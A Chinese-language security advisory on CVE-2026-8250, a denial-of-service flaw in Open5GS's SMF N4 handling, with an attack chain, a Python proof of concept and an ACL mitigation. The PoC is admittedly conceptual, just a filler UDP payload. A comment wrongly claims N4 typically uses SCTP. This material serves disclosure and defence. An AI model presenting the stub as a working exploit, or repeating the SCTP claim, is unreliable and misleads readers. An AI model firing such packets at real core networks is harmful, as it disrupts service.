CVE-2026-8250 Open5GS拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-8250

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS在2.7.7及之前的版本中存在安全漏洞。该漏洞位于SMF组件的/src/smf/n4-build.c文件中的smf_n4_build_qos_flow_to_modify_list函数。攻击者可利用网络进行远程攻击，无需用户交互且仅需低权限。通过操纵特定数据，攻击者可导致目标系统出现拒绝服务情况。目前该漏洞利用代码已公开，且厂商尚未对此问题做出响应。

技术细节

该漏洞源于Open5GS会话管理功能（SMF）在处理N4接口消息时的逻辑缺陷。具体来说，smf_n4_build_qos_flow_to_modify_list函数在构建QoS流修改列表时，未能正确验证或处理输入参数。攻击者可以通过发送特制的网络数据包（针对N4接口）来触发该漏洞。由于CVSS向量显示攻击复杂度低且无需用户交互，该漏洞相对容易被利用。一旦成功利用，将导致SMF进程崩溃或资源耗尽，从而中断5G核心网的会话管理服务。由于厂商尚未修复，风险较高。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别运行Open5GS的目标主机，并确定SMF组件N4接口的监听端口。

STEP 2

构造载荷

攻击者分析漏洞函数smf_n4_build_qos_flow_to_modify_list，构造能够触发逻辑错误的特制QoS流修改数据包。

STEP 3

投递攻击

攻击者通过网络向目标SMF组件的N4接口发送恶意数据包。

STEP 4

触发漏洞

目标系统处理畸形数据包时，由于缺乏校验导致SMF进程崩溃或挂起，造成服务拒绝。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# PoC for CVE-2026-8250
# This script demonstrates sending a crafted packet to the Open5GS SMF N4 interface.
# Target: Open5GS SMF (default N4 port is typically 8805)

TARGET_IP = "127.0.0.1"
TARGET_PORT = 8805

# Malformed payload designed to trigger the vulnerability in smf_n4_build_qos_flow_to_modify_list
# This is a conceptual representation; actual packet structure requires specific protocol encoding.
malformed_payload = b"\x00\x00\x00\x01" + b"\x41" * 100  

def send_exploit():
    try:
        print(f"[*] Sending exploit to {TARGET_IP}:{TARGET_PORT}")
        # N4 interface typically uses SCTP, but UDP might be used in testing or specific configs
        # Assuming UDP for this demonstration
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.sendto(malformed_payload, (TARGET_IP, TARGET_PORT))
        print("[+] Payload sent successfully.")
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    send_exploit()

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

在官方补丁发布之前，建议通过访问控制列表（ACL）严格限制N4接口的入站流量，仅允许合法的UPF节点IP地址连接。同时，应密切监控SMF进程的运行状态和系统日志，一旦发现异常崩溃或高资源占用，应立即进行排查。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8250
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8250
3 Details https://www.cvedetails.com/cve/CVE-2026-8250/
4 VulDB https://vuldb.com/cve/CVE-2026-8250
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4444
7 Link https://vuldb.com/submit/808476
8 Link https://vuldb.com/vuln/362547
9 Link https://vuldb.com/vuln/362547/cti